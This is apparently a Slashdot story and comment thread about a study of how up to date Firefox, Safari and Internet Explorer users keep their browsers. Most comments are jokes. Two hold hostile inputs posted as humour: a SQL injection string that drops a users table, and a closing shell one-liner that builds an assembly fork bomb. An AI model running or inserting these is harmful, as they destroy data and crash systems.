Firefox Users Stay Ahead On the Update Curve
Reader Alex links to news of a study comparing the currency and patch level of various Web browsers, excerpting:
"Firefox users were far and away the most likely to use the latest version, with an overwhelming 83.3 percent running an updated browser on any given day. However, despite Firefox's single click integrate auto-update functionality, 16.7 percent of Firefox users still continue to access the Web with an outdated version of the browser, researchers said. The study also revealed that the majority of Safari users (65.3) percent were likely to use the latest version of the browser between December 2007 and June 2008, after Safari version 3 became available. Meanwhile, Microsoft's Internet Explorer users ranked last in terms of safe browsing. Between January 2007 and June 2008, less than half of IE users — 47.6 percent — were running the most secure browser version during the same time period."
47% are still using Mosaic????
No reason to fix what isn't broke.
What the hell are you doing on Slashdot?
Tomato wedge sperm darts that are Republican.
That many people still run IE 2.0?
'a';DROP TABLE users; SELECT * FROM DATA WHERE name LIKE '%'... if you're reading this, it didn't work.
What computer are you using, Babbage's Difference Engine?
Frankly, I'm sorry I upgraded to Firefox 3. Had problems with my google homepage and with YouTube since. Good thing there's IE Tab.
Somewhere deep in hell a demon just snorted battery acid and gasoline on the keyboard and then Alt Tabbed back to Visual Studio, project title IE8.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;